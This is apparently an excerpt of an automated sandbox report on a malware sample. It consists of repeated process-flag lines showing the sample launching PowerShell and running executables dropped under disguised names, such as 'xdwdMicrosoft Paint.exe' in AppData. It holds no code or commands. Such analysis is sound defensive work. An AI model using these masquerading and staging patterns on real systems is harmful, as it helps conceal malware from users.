Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\ptKNiAaGus.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\xdwdMicrosoft Paint.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\pto2q1ow.nf5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
